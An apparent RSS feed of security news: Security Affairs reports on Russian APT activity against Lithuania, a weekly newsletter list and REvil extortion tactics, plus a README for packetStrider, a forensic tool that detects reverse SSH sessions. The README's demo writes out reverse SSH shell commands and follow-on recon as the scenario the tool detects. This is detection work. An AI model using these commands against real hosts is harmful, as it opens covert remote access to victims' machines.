RSS Security


Russia-linked APT groups exploited Lithuanian infrastructure to launch attacks

7 March 2021 at 14:54

Russia-linked APT groups leveraged the Lithuanian nation’s technology infrastructure to launch cyber-attacks against targets worldwide.

The annual national security threat assessment report released by Lithuania’s State Security Department states that Russia-linked APT groups conducted cyber-attacks against top Lithuanian officials and decision-makers in 2020.

APT29 state-sponsored hackers also exploited Lithuania’s information technology infrastructure to carry out attacks against “foreign entities developing a COVID-19 vaccine.”

In 2020, Russian intelligence operations against Lithuania decreased due to the COVID-19 pandemic, but Russia-linked APT groups increased cyber espionage campaigns against targets worldwide.

“Nevertheless, Russian intelligence operations pose a major threat to Lithuania’s national security,” State Security Department head Darius Jauniskis told Lithuanian lawmakers during the presentation of the report at the Parliament.

Jauniskis explained that the Russian government is using military and economic means to carry out its operations, including disinformation campaigns.

The report states that both cyber attacks and disinformation campaigns have increased in Lithuania in the last 12 months.

Jauniskis added that Russia-linked APT groups attempted to destabilize the political context in Lithuania by exploiting the pandemic in misinformation campaigns. Lithuanian authorities observed “dozens” of “failed attempts” to conduct disinformation campaigns.

“Those activities were well-coordinated and fueled by anti-Western propaganda coming out from the Kremlin,” Jauniskis added.

In recent years, security experts documented multiple hacking and disinformation campaigns, attributed to Russia-linked APT groups, that targeted Lithuania, Estonia, and Latvia.

Estonia’s foreign intelligence agency also blamed Russia for cyber attacks exploiting the COVID-19 pandemic to create havoc in the national context.

In April 2019, a major and orchestrated misinformation cyber attack hit the Lithuanian Defense Minister Raimundas Karoblis with the intent of discrediting him and the Lithuanian national defense system.

In December 2016, Lithuania blamed Russia for cyber attacks that hit government networks over the previous two years. The head of cyber security Rimtautas Cerniauskas confirmed the discovery of at least three pieces of Russian spyware on government computers since 2015.

Lithuanian officials targeted by the alleged Russian spyware held mid-to-low ranking positions in the government; however, Cerniauskas confirmed that their PCs contained sensitive government documents.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Lithuania)

The post Russia-linked APT groups exploited Lithuanian infrastructure to launch attacks appeared first on Security Affairs.

Security Affairs newsletter Round 304

7 March 2021 at 12:33

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the international press subscribe here.

EU leaders aim at boosting defense and security, including cybersecurity
New Zealand-based cryptocurrency exchange Cryptopia hacked again
ByteDance agreed to pay $92M in US privacy Settlement for TikTok data collection
Gootkit delivery platform Gootloader used to deliver additional payloads
Intern caused ‘solarwinds123’ password leak, former SolarWinds CEO says
NSA embraces the Zero Trust Security Model
Alleged China-linked APT41 group targets Indian critical infrastructures
Distributor of Asian food JFC International hit by Ransomware
French multinational dairy Lactalis hit by a cyber attack
Pwn20wnd released the unc0ver v 6.0 jailbreaking tool
Attackers took over the Perl.com domain in September 2020
Bug bounty hunter awarded $50,000 for a Microsoft account hijack flaw
Clop ransomware gang leaks data allegedly stolen from cybersecurity firm Qualys
Cyber Defense Magazine – March 2021 has arrived. Enjoy it!
Data Breach: Millions of Phone Numbers, Recordings, and Call Logs Compromised in Ringostat Data Leak
Four zero-days in Microsoft Exchange actively exploited in the wild
Google fixes Critical Remote Code Execution issue in Android System component
The Ursnif Trojan has hit over 100 Italian banks
CISA emergency directive urges to fix Microsoft Exchange zero-days
Group-IB: ransomware empire prospers in pandemic-hit world. Attacks grow by 150%
GRUB2 boot loader maintainers fixed hundreds of flaws
Sunshuttle, the fourth malware allegedly linked to SolarWinds hack
VMware addresses Remote Code Execution issue in View Planner
Five privilege escalation flaws fixed in Linux Kernel
GoldMax, GoldFinder, and Sibot, 3 new malware used by SolarWinds attackers
Managed Services provider CompuCom by Darkside ransomware
Millions of travelers of several airlines impacted by SITA data breach
Microsoft releases IOC Detection Tool for Microsoft Exchange Server flaws

If you want to receive the weekly Security Affairs Newsletter for free subscribe here. Subscribing to the newsletter you will also receive the best of the international press on cybersecurity, intelligence, and cybercrime.


Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 304 appeared first on Security Affairs.

packetStrider - A Network Packet Forensics Tool For SSH

7 March 2021 at 11:30
By: Zion3R


packetStrider for SSH is a packet forensics tool that aims to provide valuable insight into the nature of SSH traffic, shining a light into the corners of SSH network traffic where golden nuggets of information previously lay in the dark.


The problem that packet strider aims to help with (AKA Why?)

SSH is obviously encrypted, yet valuable contextual information still exists within the network traffic that can go towards TTPs, intent, success and magnitude of actions on objectives. There may even exist situations where valuable context is not available or has been deleted from hosts, and so having an immutable and unalterable passive network capture gives additional forensic context. "Packets don't lie".

Separately to the forensic context, packet strider predictions could also be used in an active fashion, for example to shun/RST forward connections if a tunneled reverse SSH session initiation feature is predicted within, even before reverse authentication is offered.


The broad techniques of packet strider (AKA How?)
  • Builds a rich feature set in the form of pandas dataframes. Over 40 features are engineered from packet metadata such as SSH Protocol message content, normalized statistics, direction, size, latency and sliding window features.
  • Strides through this feature set numerous times using sliding windows (Inspired by Convolutional Neural networks) to predict:
    • The use of the -R option in the forward session - this is what enables a Reverse connection to be made later in the session. This artefact is discovered very early in the session, directly after the forward session is authenticated. This is the first available warning sign that Reverse sessions are possible.
    • Initiation of the Reverse SSH session, this can occur at any point (early, or late) in the forward session. This is discovered prior to the Reverse session being authenticated successfully. This is the second warning sign, in that a reverse session has just been requested and setup for authentication.
    • Success and/or Failure of the Reverse session authentication. This is the third and final warning sign, after this point you know someone is on your host, inside a reverse session.
    • The use of the -A option (SSH Agent Forwarding), which enables the client to share its local SSH private keys with the server. This functionality is generally considered dangerous. References: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident , https://skylightcyber.com/2019/09/26/all-your-cloud-are-belong-to-us-cve-2019-12491/ , https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12491
    • All predictions and metadata reports on a stream by stream basis.
    • Human or scripted, based on timing deltas.
    • Is the server already known to the client? or was it the first time a connection between the two has been made. This is done through packet deltas associated with known_hosts.
    • Whether a client certificate or password auth was used, and if length of password is 8 chars or less.
    • keystrokes, delete key press, enter key presses (cut and paste and up/down is YMMV/experimental).
    • exfil/infil data movement predictions in both Forward and Reverse sessions.
    • Works on interactive sessions as well as file based ssh file transfer apps (eg scp, putty, cyberduck etc).
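
The sliding-window idea described above, as an added example that is not packetStrider's own code: it strides over constructed packet metadata to label key presses, Enter, human versus scripted timing, and inbound data volume. The packet sizes, the "smallest client packet is a keystroke" rule and the 0.05 s gap threshold are assumptions made for illustration; the real tool engineers over 40 features.

```python
from statistics import median

# Constructed packet metadata: (seconds, direction, encrypted payload bytes).
# "c2s" = client to server, "s2c" = server to client. Sizes are illustrative.
HUMAN = [
    (0.00, "c2s", 36), (0.01, "s2c", 36),    # 'l' and its echo
    (0.24, "c2s", 36), (0.25, "s2c", 36),    # 's' and its echo
    (0.61, "c2s", 36), (0.62, "s2c", 420),   # Enter, then command output
    (0.63, "s2c", 1380), (0.64, "s2c", 612),
    (2.90, "c2s", 36), (2.91, "s2c", 36),    # next command starts
]
# Same stream at machine speed, as a script or paste would produce.
SCRIPTED = [(t / 100, d, s) for t, d, s in HUMAN]

def classify(packets, side=2, stride=1):
    """Stride a window of `side` packets either side of each center packet."""
    # Assumption: the smallest client packet in the stream is one keystroke.
    key_size = min(s for _, d, s in packets if d == "c2s")
    events = []
    for c in range(0, len(packets), stride):
        lo = max(0, c - side)                 # clip the window at the edges
        window = packets[lo:c + side + 1]
        t, direction, size = packets[c]
        if direction != "c2s" or size != key_size:
            continue
        replies = [p for p in window[c - lo + 1:] if p[1] == "s2c"]
        if not replies:
            continue
        # Echo of equal size => printable key; larger reply => Enter + output.
        kind = "keystroke" if replies[0][2] == key_size else "enter"
        events.append((c, t, kind))
    return events

def human_or_scripted(events, min_human_gap=0.05):
    """Label a stream from the median gap between client key events."""
    times = [t for _, t, _ in events]
    gaps = [b - a for a, b in zip(times, times[1:])]
    if not gaps:
        return "unknown"
    return "human" if median(gaps) >= min_human_gap else "scripted"

def inbound_after_enter(packets, events):
    """Bytes the server sent after each Enter, up to the next client packet."""
    totals = []
    for idx, _, kind in events:
        if kind != "enter":
            continue
        total = 0
        for _, direction, size in packets[idx + 1:]:
            if direction == "c2s":
                break
            total += size
        totals.append(total)
    return totals
```

The `side` and `stride` parameters mirror the tool's -w and -s options (defaults 2 and 1); everything else here is a simplification.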

Getting started

Python3 has been used, and you will need the following modules (YMMV on python2)

pip3 install pandas matplotlib pyshark

Usage:

python3 packetStrider-ssh.py -h

Output:

usage: packetStrider-ssh.py [-h] [-f FILE] [-n NSTREAM] [-m] [-k] [-p]
                            [-z ZOOM] [-d DIRECTION] [-o OUTPUT_DIR]
                            [-w WINDOW] [-s STRIDE]

packetStrider-ssh is a packet forensics tool for SSH. It creates a rich
feature set from packet metadata such SSH Protocol message content, direction,
size, latency and sequencing. It performs pattern matching on these features,
using statistical analysis, and sliding windows to predict session initiation,
keystrokes, human/script behavior, password length, use of client
certificates, context into the historic nature of client/server contact and
exfil/infil data movement characteristics in both Forward and Reverse sessions

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  pcap file to analyze
  -n NSTREAM, --nstream NSTREAM
                        Perform analysis only on stream n
  -m, --metaonly        Display stream metadata only
  -k, --keystrokes      Perform keystroke prediction
  -p, --predict_plot    Plot data movement and keystrokes
  -z ZOOM, --zoom ZOOM  Narrow down/zoom the analysis and plotting to only
                        packets "x-y"
  -d DIRECTION, --direction DIRECTION
                        Perform analysis on SSH direction : "forward",
                        "reverse" OR "both"
  -o OUTPUT_DIR, --output_dir OUTPUT_DIR
                        Directory to output plots
  -w WINDOW, --window WINDOW
                        Sliding window size, # of packets to side of window
                        center packet, default is 2
  -s STRIDE, --stride STRIDE
                        Stride between sliding windows, default is 1

Example

The pcap "forward_reverse.pcap" is from a common TTP of a Reverse SSH shell, a favorite of red teams everywhere. Specifically the following commands were used, to highlight the capabilities of packet strider in a simple way:

  • Forward connection from victim

    • The command for the forward session was ssh user@1.2.3.4 -R 31337:localhost:22 which binds local port 31337 ready for the reverse SSH connection back to the victim PC. This connection can be effected in many ways including manually, by an RCE, SSRF, or some form of persistence. For the purpose of this demo, it is a manual standard forward session.
    • This was NOT the first time the client has seen the server. We see this because the delta for related packets was very small: the server's key fingerprint was already in the client's known_hosts, so the user was not prompted to add it, which would have increased the latency of packets.
    • Two consecutive failed password logins by a human, followed by a successful login with an 8+ character password.
    • ls is typed in the forward session, in this sequence: 'l' 'w' 'w' 'back-space' 'back-space' 's' and then enter. The total size of data transmitted over the wire (as the output of ls) is classified as infiltration, given that it is inbound.
  • Now on the attacker's machine (the server), a reverse shell is initiated back to the victim:

    • ssh victim@localhost -p 31337. At this point, which is even before the authentication process begins, packet strider has identified the Reverse session SSH initiation, at packet 72.
    • Now the attacker has a reverse shell on the victim host. From here they can turn off history settings, and run whatever lateral movement or ransacking hijinks they desire. The simple examples in this demo are initial user recon.
    • last is run in the form of keystrokes 'l' 'a' 's' 'r' 'delete' 't' 'enter'
    • who is run in the form of 'w' 'h' 'o' 'enter'
    • exit is run in the form of 'e' 'x' 'i' 't'
  • Then finally with the Forward session the session is closed, just to demonstrate that the forward SSH feature detection still works.

    • exit

Network traffic from this activity is saved to tcpdump.pcap and now it's time to run Packet Strider.

python3 packetStrider-ssh.py -f tcpdump.pcap -k -p -o out



This plot shows a timeline of key predictions (image has been annotated here)



This plot shows some window statistics, useful for a deep dive and experimenting with features.



This plot shows a simple histogram



Inspiration

This project was done as a personal Proof of Concept, as a way for me to practice with some data science libraries in Python, it was heavily inspired by my Coursera studies in Machine Learning and Data Science, in particular the pandas library and the way in which Convolutional Neural Networks (CNN) "stride" through image pixel sets using sliding windows to detect certain features within.


Tips

Packet Strider does a vast amount of "striding" in full capacity mode. This can result in some substantial resource usage if the pcap is large, or more precisely if there are many packets in the pcap. Here are some speed up tips, these are particularly useful as an initial run for example just to see if there was reverse SSH activity predicted, and then adding functionality if you desire.

  • Ensure you are running with the latest patches of modules that do some heavy lifting, eg pyshark/tshark, pandas and matplotlib.
  • The -p --predict_plot option is the most intensive operation. Think about just running with the output to terminal, and then see if you'd like this plotted.
  • Use the -m --metaonly option. This only retrieves the high level metadata such as Protocol names and HASSH data. This can be useful to quickly determine if you are dealing with an interactive session using OpenSSH, or with a file transfer client like Cyberduck.
  • Pre filter the pcap to the ssh traffic.
  • Pre filter the pcap to the stream you want, which you may have learned by previously running with the speedy -m --metaonly option. You can examine only stream "NSTREAM" with the "-n NSTREAM" option, or you can pre filter with wireshark etc.
  • There may be times when you identify something interesting in a subset of a very large packet set. Here you can use the zoom feature to only examine and plot the packets in the region you are interested in. Use -z ZOOM, --zoom ZOOM for this. eg -z 100-500
  • Most times you will be interested in understanding keystroke activity, so while not using the -k option will save processing speed, it also means you won't get this valuable insight.

TODO
  • More protocols!
  • Look at Multi threading and see where this can help processing speed.
  • Improve efficiency of script, particularly plotting times.
  • Improve the Pasting indicator
  • Improve the 'up/down' key indicator
  • Annotate plots with imagemagick or similar
  • Improve the reporting function, write out to disk.
  • The Reverse key indicator is conservative because packet encapsulation can potentially report two keystrokes. This issue does not exist for forward keystrokes, as the packet order has been treated in case they come in out of order. Examine options here.
  • Port to golang for speed
  • Real time mode
  • Examine the effect of additional tunneling local ports over the forward connection.

Disclaimer

Use at your own risk. See License terms.



REvil Ransomware gang uses DDoS attacks and voice calls to make pressure on the victims

7 March 2021 at 09:48

The REvil ransomware operators are using DDoS attacks and voice calls to journalists and victim’s business partners to force victims to pay the ransom.

The REvil/Sodinokibi ransomware operators announced that they are using DDoS attacks and voice calls to victim’s business partners and journalists to force the victims into paying the ransom.

The announcement shows an improvement in the double-extortion tactic, which is no longer limited to threatening to leak the victims’ stolen files if they don’t pay the ransom.

According to Bleepingcomputer, in February, the REvil ransomware gang published a job notice in which they were searching for experts to perform DDoS attacks and use VOIP calls to contact victims and their business partners.

The malware researcher who goes online with the moniker 3xp0rt reported that REvil operators are offering their network of affiliates new options to put pressure on victims, in particular calls to news media and business partners for free, and DDoS (Layer 3 and 7) attacks as a paid service.

#Malware #Ransomware #REvil

REvil Ransomware launched a service for contact to news media, companies for the best pressure at no cost, and DDoS (L3, L7) as a paid service.

Also, they reminded about developing support for VM ESXi and a polymorphic engine for windows. pic.twitter.com/MahKROK161

— 3xp0rt (@3xp0rtblog) March 6, 2021

Unfortunately, these extortion options are not a novelty in the threat landscape. Multiple ransomware gangs use VOIP calls and DDoS attacks to put pressure on the victims.


Pierluigi Paganini

(SecurityAffairs – hacking, REvil ransomware)

The post REvil Ransomware gang uses DDoS attacks and voice calls to make pressure on the victims appeared first on Security Affairs.
